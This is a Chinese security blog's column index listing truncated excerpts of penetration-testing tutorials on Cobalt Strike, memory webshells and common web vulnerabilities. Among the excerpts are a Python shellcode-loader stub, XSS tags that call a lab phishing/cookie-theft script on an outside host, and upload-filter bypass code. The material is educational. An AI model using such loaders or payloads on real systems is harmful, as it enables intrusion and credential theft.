
渗透测试
文章平均质量分 72
风炫安全
ID:风炫 专注于:网络安全、渗透测试、编程开发、安全开发。
公众号:风炫安全
博客:https://evalshell.com
展开
-
溯源反制思路整合
溯源反制思路整合文章目录溯源反制思路整合0x01反制的整体思路0x02 反制具体思路0x0201 反制主机0x0202 反制后门附件0x0203 反制攻击工具0x03 拿下傀儡机之后如何进行源IP的查找0x0301 日志分析01 Web日志分析02 系统日志分析0x0302 进程分析WindowsLinux0x0303 流量分析通用Windowslinux0x0304 服务查询WindowsLInux0x0305 其他技巧通用查询在线登陆者0x04 溯源相关思路根据IP进行溯源根据域名进行溯源根据ID溯源原创 2021-07-27 20:26:04 · 2625 阅读 · 0 评论 -
深入浅出内存马(一)
深入浅出内存马(一)0x01 简述0x0101 Webshell技术历程在Web安全领域,Webshell一直是一个非常重要且热门的话题。在目前传统安全领域,Webshell根据功能的不同分为三种类型,分别是:一句话木马,小马,大马。而根据现在防火墙技术的更新迭代,随后出现了加密的木马技术,比如:加密一句话。而我们今天要说的是一种新的无文件的Webshell类型:内存马。0x0102 为什么会使用内存马?传统Webshell连接方式,都是先通过某种漏洞将恶意的脚本木马文件上传,然后通过中国菜刀,或原创 2021-07-12 09:04:26 · 1493 阅读 · 2 评论 -
cobalt strike 插件开发一
关注风炫安全,分享最新网络安全知识。0x01 agscript简介agscript为Aggressor Script的简写。agscript是CobaltStrike 3.0之后版本中内置的脚本语言,利用Aggresor编写脚本可轻松地武装您的CobaltStrike客户端。agscript是一种简单脚本语言,主要用于红队编写针对肉鸡的攻击脚本。 它有两个作用,一是可以用来对自己的肉鸡做持久性控制。二是可以用来扩展或修改Cobalt Strike客户端以满...原创 2021-03-29 21:03:00 · 1826 阅读 · 0 评论 -
cobalt strike使用跳板进行内网渗透
0x01 什么是 PivotingPivoting ,在本手册中,指的是「将一个受害机器转为其他攻击和工具的跳板」。Cobalt Strike 的Beacon 提供了多种 pivoting 选项。前提是 Beacon 处于交互模式。交互模式意味着一个 Beacon 每 秒内多次连接到团队服务器。使用 sleep 0 命令来使你的 Beacon 进入交互模式。0x02 开启SOCKS 代理通过 [beacon] → Pivoting → SOCKS Server 来在你的团队服务器上设..原创 2021-03-21 10:27:11 · 1605 阅读 · 1 评论 -
CobaltStrike从入门到精通系列视频教程(五)后渗透攻击
0X001 基础介绍• Access 子菜单包含对凭据的操作和提权在内的一些选项。• Explore 子菜单包含信息探测和与目标系统交互的一些选项。• Pivoting 子菜单你可以通过一个 Beacon 来配置工具来搭建流量隧道。• Session 菜单你可以管理当前 Beacon 会话。beacon讲解Command Description ------- ----------- browserpivo原创 2021-03-11 18:28:19 · 443 阅读 · 0 评论 -
Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击
https://www.bilibili.com/video/BV1P64y1f7e1?p=6Cobalt Strike Web Drive-By web钓鱼攻击在这里补充一个上节课的新的知识点,如何使用python语言的payload 加载器去攻击# length: 894 bytesfrom ctypes import *import ctypesbuf = "" #这里填写payloadPROT_READ = 1PROT_WRITE = 2PROT_EXEC = 4def exec原创 2021-03-07 12:50:16 · 530 阅读 · 0 评论 -
Cobalt Strike从入门到精通之用户驱动攻击包
https://www.bilibili.com/video/BV1P64y1f7e1?p=5Cobalt Strike 用户驱动攻击包Attack PackagesHTML Application首先打开Attack->Packages->HTML Application, 选择好监听器。这里的攻击方式有三种分别是,Executable(可执行文件), Powershell,VBA(宏代码攻击)Executable 基于Windows二进制编程的可执行文件。PowerShell原创 2021-03-07 12:44:18 · 465 阅读 · 0 评论 -
Cobalt Strike从入门到精通之定制配置文件进行高级攻击
在线视频地址Cobalt Strike的配置文件讲解简介Beacon是Cobalt Strike为高级攻击者建模的Payload。使用Beacon通过HTTP,HTTPS或DNS出口网络。而且Beacon非常灵活,支持异步和交互式通信。异步通信既低又慢。Beacon将通讯本地,下载任务,然后进入睡眠状态。交互式通信实时发生。cobalt Strike 的Beacon(信标)的一些Http特征信息可以由C2配置文件进行修改和定制化,所以可定制的C2配置文件可以指定服务端如何发送,接受数据的规律和格式,原创 2021-02-22 17:18:29 · 1148 阅读 · 1 评论 -
CobaltStrike系列视频教程之简单介绍
在线视频地址风炫安全之CobaltStrike系列视频教程个人介绍主攻方向:Web安全、网络安全、安全开发。ID:风炫知识库:https://evalshell.com这节课讲解: 定制化Cobalt Strike配置文件教程只是为了提供学习和研究,所有技术切勿用于非法用途!Cobalt Strike 介绍Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有原创 2021-02-22 17:15:40 · 402 阅读 · 0 评论 -
风炫安全Web安全入门第一期课程总结
风炫安全Web安全入门第一期课程总结我们第一期的Web安全入门学习,已经基本完成了,这节课我们来最后做一下总结。这套Web安全入门学习是我从20年10月份开始,持续分享的一套课程,也是我第一次分享连续的课程,按照caoz的名言“输出倒逼输入”,可以看到我还有是很多的缺点,特别是说话比较快,这个缺点我现在会慢慢的克服,不过总的来说到今天也算是兑现了承诺,坚持下来了,做了一个完结,加上这节课总共课程分为50节课。现在我把整个课程链接放到这里,提供给大家,很多人并没有看过之前的全部视频,那么今天我就这里集合原创 2021-02-13 19:42:03 · 238 阅读 · 1 评论 -
风炫安全WEB安全学习第四十九节课 靶场的搭建与实战
靶场实战自《网络安全法》实施以后,在互联网上未经授权的渗透测试是违法行为。缺少了实战的战场,我们现在一般用靶场来进行实战的渗透测试学习,因为这样不会影响别人网站服务的正常运行,不会影响到别人的业务。我在这里推荐几个靶场,然后可以对靶场里面的漏洞进行针对化学习并实战。线上靶场推荐https://hack.zkaq.cn/ 封神台,掌控安全的线上靶场https://www.ichunqiu.com/ I春秋,很早就出来的一个综合的靶场。https://redtiger.labs.overthewir原创 2021-02-09 21:11:26 · 1168 阅读 · 0 评论 -
风炫安全WEB安全学习第四十八节课 信息收集之WEB安全漏洞扫描
信息收集之Web漏洞扫描Web漏洞扫描器实在是太多了。Web安全扫描器可能是网络安全入门第一节课,这节课的内容其实大家比我都懂。我这里还是抛砖引玉一下,那么本节课就算是一个科普文,介绍几款常用的Web安全扫描器,至于一些细分领域的扫描器,大家可以借鉴github上一个扫描器集合https://github.com/hannoch/scaner主流综合Web安全扫描器AWVS推荐指数:????????????????????官方网站:https://www.acunetix.com/详细使用文档原创 2021-02-01 13:09:46 · 282 阅读 · 0 评论 -
风炫安全WEB安全学习第四十六课 信息收集之CMS指纹识别
信息收集之网站/主机信息收集0x01 CMS指纹识别Cms 称为内容管理系统,用于网站内容文章管理web渗透过程中,对目标网站的指纹识别比较关键,通过工具或手工来识别CMS系统的自建、二次开发,还是直接使用开源的CMS程序至关重要,通过获取的这些信息来决定后续渗透的测试思路和策略。识别原理利用cms特定的文件,路径,目录扫描目录扫描对应信息收集来说特为重要,比如robots文件当中就可能泄露网站的后台或者CMS信息等,安装包中便泄露了网站的源码,phpinfo泄露了服务器的一些配置信息,原创 2021-01-23 12:12:28 · 429 阅读 · 2 评论 -
风炫安全WEB安全学习第四十五节课 信息收集之子域名搜集
信息收集之子域名搜集渗透测试常见手法和思维信息收集简述信息收集对于渗透测试前期来说是非常重要的,因为只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。正所谓,知己知彼百战百胜!信息收集的方式可以分为两种:主动和被动。主动信息收集:通过直接访问、扫描网站,这种流量将流经网站被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索,Zoomeye搜索等收集方法子域名收集域名按照层级可以分为顶级域、主域名、子域名等 。例如.原创 2021-01-19 16:33:56 · 194 阅读 · 0 评论 -
风炫安全WEB安全学习第四十四节课 敏感信息泄漏
敏感信息泄漏0x01 漏洞简介敏感数据包括但不限于:口令、密钥、证书、会话标识、License、隐私数据(如短消息的内容)、授权凭据、个人数据(如姓名、住址、电话等)等,在程序文件、配置文件、日志文件、备份文件及数据库中都有可能包含敏感数据。主要分为由版本管理软件导致的泄露, 文件包含导致的泄露和配置错误导致的泄露.0x02 漏洞原理由于后台人员的疏忽或者不当的设计,导致不应该被前端用户看到的数据被轻易的访问到。 比如:通过访问url下的目录,可以直接列出目录下的文件列表;输入错误的url参数原创 2021-01-12 11:04:53 · 1238 阅读 · 0 评论 -
风炫安全Web安全学习第四十三节课 路径遍历漏洞
风炫安全Web安全学习第四十三节课 路径遍历漏洞路径遍历0x01 漏洞概述路径遍历攻击(也称作目录遍历)的目标是访问web根目录外存储的文件和目录。通过操纵使用“点-斜线(…/)”序列及其变体引用文件的变量或使用绝对文件路径,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码或配置和关键的系统文件。应该注意的是,对文件的访问受到系统操作访问控制的限制(例如在Microsoft Windows操作系统上锁定或使用中的文件)。这种攻击也被称为“点点斜线”,“目录遍历”,“目录爬升”和“回溯”。原创 2021-01-10 22:42:44 · 387 阅读 · 1 评论 -
风炫安全Web安全学习第四十二节课 SSRF漏洞演示与讲解
第四十二节课 风炫安全Web安全学习第四十一节课 SSRF漏洞演示与讲解SSRF(Server-Side Request Forgery:服务器端请求伪造)0x01 漏洞简介Ssrf是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。Example:GET /index.php?url=http://google.com/ HTTP/1.1Host: example.com在这里,http://example.com 从它的服务器获原创 2021-01-07 14:47:27 · 497 阅读 · 0 评论 -
风炫安全Web安全学习第四十一节课 XXE漏洞演示与讲解
风炫安全Web安全学习第四十一节课 XXE漏洞演示与讲解XXE漏洞0x01 基础知识XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,…),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,…),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。<?xml version="1.0"?><原创 2021-01-07 14:47:09 · 253 阅读 · 0 评论 -
风炫安全Web安全学习第四十节课 反序列化漏洞攻击利用演示
风炫安全Web安全学习第四十节课 反序列化漏洞攻击利用演示0x02 反序列化漏洞利用反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控,从上面的例子看,这个函数的参数是一个序列化的对象,而序列化的对象只含有对象的属性,那我们就要利用对对象属性的篡改实现最终的攻击。01对象注入当用户的请求在传给反序列化函数unserialize()之前没有被正确的过滤时就会产生漏洞。因为PHP允许对象序列化,攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的unserialize函数,最终原创 2021-01-06 09:56:46 · 398 阅读 · 0 评论 -
风炫安全Web安全学习第三十九节课 反序列化漏洞基础知识
风炫安全Web安全学习第三十九节课 反序列化漏洞基础知识反序列化漏洞0x01 序列化相关基础知识0x01 01 序列化演示序列化就是把本来不能直接存储的数据转换成可存储的数据,并且不会丢掉数据格式序列化(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。 在序列化期间,对象将其当前状态写入到临时或持久性存储区。 以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 序列化使其他代码可以查看或修改,那些不序列化便无法访问的对象实例数据。<?php原创 2021-01-06 09:56:33 · 156 阅读 · 0 评论 -
风炫安全WEB安全学习第三十八节课 越权漏洞演示与讲解
风炫安全WEB安全学习第三十八节课 越权漏洞演示与讲解越权漏洞0x01 漏洞介绍越权漏洞的危害与影响主要是与对应业务的重要性相关,比如说某一页面服务器端响应(不局限于页面返回的信息,有时信息在响应包中,页面不一定能看见)中返回登录名、登录密码、手机号、×××等敏感信息,如果存在平行越权,通过对用户ID的遍历,就可以查看所有用户的敏感信息,这也是一种变相的脱裤,而且很难被防火墙发现,因为这和正常的访问请求没有什么区别,也不会包含特殊字符,具有十足的隐秘性。水平越权水平越权指的是攻击者尝试访问与他拥原创 2021-01-06 09:56:20 · 770 阅读 · 0 评论 -
风炫安全web安全学习第三十七节课 15种上传漏洞讲解(二)
风炫安全web安全学习第三十七节课 15种上传漏洞讲解(二)05后缀名黑名单校验之上传.htaccess绕过还是使用黑名单,禁止上传所有web容器能解析的脚本文件的后缀$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2","ph原创 2021-01-06 09:56:02 · 186 阅读 · 0 评论 -
风炫安全web安全学习第三十六节课-15种上传漏洞讲解(一)
风炫安全web安全学习第三十六节课 15种上传漏洞讲解(一)文件上传漏洞0x01 漏洞描述和原理文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。网站web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshel原创 2021-01-06 09:55:49 · 272 阅读 · 0 评论 -
风炫安全web安全学习第三十五节课 文件下载和文件读取漏洞
风炫安全web安全学习第三十五节课 文件下载和文件读取漏洞0x03 任意文件下载漏洞一些网站由于业务需求,往往需要提供文件下载功能,但若对用户下载的文件不做限制,则恶意用户就能够下载任意敏感文件,这就是文件下载漏洞。漏洞产生原因有读取文件的函数读物文件的路径用户可控,且没有经过校验,或者校验不严格输出文件内容一个正常的网站,存在一个下载文件的功能,同时还会从浏览器接收文件名字文件下载的两种方式1、直接下载:<a href=”http://www.a.com/xxx.rar”&原创 2021-01-06 09:55:34 · 302 阅读 · 0 评论 -
风炫安全web安全学习第三十四节课 文件包含漏洞防御
风炫安全web安全学习第三十四节课 文件包含漏洞防御文件包含防御在功能设计上不要把文件包含的对应文件放到前台去操作过滤各种…/,https://, http://配置php.ini文件allow_url_fopen=offallow_url_include=offmagic_quotes_gpc=on通过白名单策略topic.php,image.phpfile=topic.php$allow_file = [ 'topic.php', 'image.php'原创 2021-01-06 09:55:21 · 173 阅读 · 0 评论 -
风炫安全web安全学习第三十三节课 文件包含漏洞基础以及利用伪协议进行攻击
风炫安全web安全学习第三十三节课 文件包含漏洞基础以及利用伪协议进行攻击文件包含漏洞参考文章:https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/分类LFI(Local File Inclusion)本地文件包含漏洞,顾名思义,指的是能打开并包含本地文件的漏洞。大部分情况下遇到的文件包含漏洞都是LFI。简单的测试用例如前所示。RFI(Remote File原创 2021-01-06 09:25:15 · 267 阅读 · 0 评论 -
风炫安全web安全学习第三十二节课 Python代码执行以及代码防御措施
风炫安全web安全学习第三十二节课 Python代码执行以及代码防御措施Python 语言可能发生的命令执行漏洞内置危险函数eval和exec函数evaleval是一个python内置函数,语法为eval(expression, globals=None,locals=None)eval函数接收三个参数:其中 expression参数是用做运算的字符串类型表达式;globals参数用于指定运行时的全局命名空间;Locals参数用于指定运行时的局部命名空间。globals与 locals原创 2021-01-06 09:25:01 · 172 阅读 · 0 评论 -
风炫安全web安全学习第三十一节课 命令执行以及代码执行演示
风炫安全web安全学习第三十一节课 命令执行以及代码执行演示参考:http://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e4%b8%89%e5%8d%81%e4%b8%80%e8%8a%82%e8%af%be-%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c%e4%bb%a5%e5%8f%8a原创 2021-01-06 09:24:40 · 143 阅读 · 0 评论 -
风炫安全web安全学习第三十节课 命令执行&代码执行基础
风炫安全web安全学习第三十节课 命令执行&代码执行基础代码执行&命令执行RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。而,如果,设计者在完成原创 2021-01-05 20:16:28 · 122 阅读 · 0 评论 -
风炫安全web安全学习第二十九节课 CSRF防御措施
风炫安全web安全学习第二十九节课 CSRF防御措施CSRF防御措施增加token验证对关键操作增加token验证,token值必须随机,每次都不一样关于安全的会话管理(SESSION)不要在客户端保存敏感信息关闭浏览器直接销毁SESSION设置会话过期操作,比如超过15分钟没有操作,直接销毁SESSION访问控制的安全管理敏感信息修改的时候需要二次验证,比如修改密码需要验证旧密码。敏感信息修改使用POST,而不是GET通过HTTP头部的REFERER来限制原来页面原创 2021-01-05 20:14:26 · 108 阅读 · 0 评论 -
风炫安全web安全学习第二十八节课 CSRF攻击原理
风炫安全web安全学习第二十八节课 CSRF攻击原理CSRF简介跨站请求伪造 (Cross-Site Request Forgery, CSRF),也被称为 One Click Attack 或者 Session Riding ,通常缩写为CSRF,是一种对网站的恶意利用。尽管听起来像XSS,但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。在攻击的场景伪造一个请求(一般是一个链接),然后欺骗用户点击,用户一旦点击了这个请求,整个攻击也就完原创 2021-01-05 20:12:50 · 170 阅读 · 0 评论 -
风炫安全WEB安全学习第二十七节课 XSS的防御措施
风炫安全WEB安全学习第二十七节课 XSS的防御措施XSS防御措施总的原则控制好输入/输出过滤:根据业务需求进行过滤,对email,手机号码这样的输入框进行验证。转义:所有输出到前端的数据都根据输出点进行转义,对输入的字符串进行html实体化编码PHPphp可以用以下函数来防御htmlspecialchars();htmlentities();HTMLPurifier.auto.php插件 http://htmlpurifier.org/downloadRemoveXss函数 ht原创 2021-01-05 20:10:50 · 180 阅读 · 0 评论 -
风炫安全WEB安全学习第二十六节课 XSS常见绕过防御技巧
风炫安全WEB安全学习第二十六节课 XSS常见绕过防御技巧XSS绕过-过滤-编码核心思想后台过滤了特殊字符,比如说<img src=x οnerrοr=“alert(‘xxx’)” 将alert(‘xxx’)进行url编码<img src=x onerror="alert(%27xxx%27)" />这样并不会执行,因为这些属性标签并不会正常解析这些编码使用html实体编码则可以<img src=x onerror="al&原创 2021-01-05 19:17:49 · 127 阅读 · 0 评论 -
风炫安全WEB安全学习第二十五节课 利用XSS键盘记录
风炫安全WEB安全学习第二十五节课 利用XSS键盘记录XSS键盘记录同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据是会被拒绝的。同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的重要安全机制。注意,资源文件不受影响:<script src="..."><img src="..."><原创 2021-01-05 19:13:50 · 177 阅读 · 0 评论 -
风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击
风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击XSS钓鱼攻击HTTP Basic Authentication认证大家在登录网站的时候,大部分时候是通过一个表单提交登录信息。但是有时候浏览器会弹出一个登录验证的对话框,如下图,这就是使用HTTP基本认证。在你访问一个需要HTTP Basic Authentication的URL的时候,如果你没有提供用户名和密码,服务器就会返回401,如果你直接在浏览器中打开,浏览器会提示你输入用户名和密码,也就是上面的图示。要在发送请求的时候添加H原创 2021-01-05 19:10:41 · 159 阅读 · 0 评论 -
风炫安全WEB安全学习第二十三节课 利用XSS获取COOKIE
风炫安全WEB安全学习第二十三节课 利用XSS获取COOKIEXSS如何利用获取COOKIE我们使用pikachu写的pkxss后台使用方法:<img src="http://fx.com/pikachu/pkxss/xfish/xfish.php" /><script src="http://fx.com/pikachu/pkxss/xfish/xfish.php"></script>参考:http://blog.evalshell.com/2020原创 2021-01-05 18:03:30 · 152 阅读 · 0 评论 -
风炫安全Web安全学习第十节课到十五课 数字型的Sql注入和基于时间和布尔型的Sql注入
数字型的Sql注入风炫安全Web安全学习第十一节课 字符型和搜索型的sql注入风炫安全Web安全学习第十二节课 mysql报错函数注入风炫安全Web安全学习第十三节课 CUD类型的sql注入风炫安全Web安全学习第十四节课 Http header类型的sql注入风炫安全Web安全学习第十五节课 基于时间和布尔型的Sql注入SQL注入基础知识数字: select username,email from users where id=1;字符串:Select id,email from mem原创 2021-01-05 16:02:51 · 165 阅读 · 0 评论 -
风炫安全WEB安全学习第九节课 常见Sql注入漏洞(一)
风炫安全WEB安全学习第九节课 常见Sql注入漏洞(一)SQL注入基础知识数字: select username,email from users where id=1;字符串:Select id,email from members where username=‘xxx’;搜索型:select id,email from member where username like ‘%v%’;我们所有的注入的攻击,本质上是对网站上的sql进行闭合 然后执行我们自己的payload...原创 2021-01-05 13:02:38 · 131 阅读 · 0 评论 -
风炫安全WEB安全学习第二十二节课 DOM型XSS讲解
风炫安全WEB安全学习第二十二节课 DOM型XSS讲解Dom型XSS演示通过Javascript,可以重构整个HTML文档,你可以添加、移除、改变或重排页面上的项目要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行访问的入口,这个入口,连同对HTML元素进行添加、移动、改变或者移除的方法和属性,都是通过文档对象模型来获得的(DOM)所以,你可以把DOM理解为一个一个访问HTML的标准编程接口...原创 2020-12-24 10:47:49 · 164 阅读 · 0 评论 -
风炫安全WEB安全学习第二十一节课 存储型XSS讲解
风炫安全WEB安全学习第二十一节课 存储型XSS讲解存储型XSS演示存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。如下面这个点击弹出自己的在该网站的cookie:最大的区别就是xss代码是否存储原创 2020-12-24 10:47:07 · 274 阅读 · 0 评论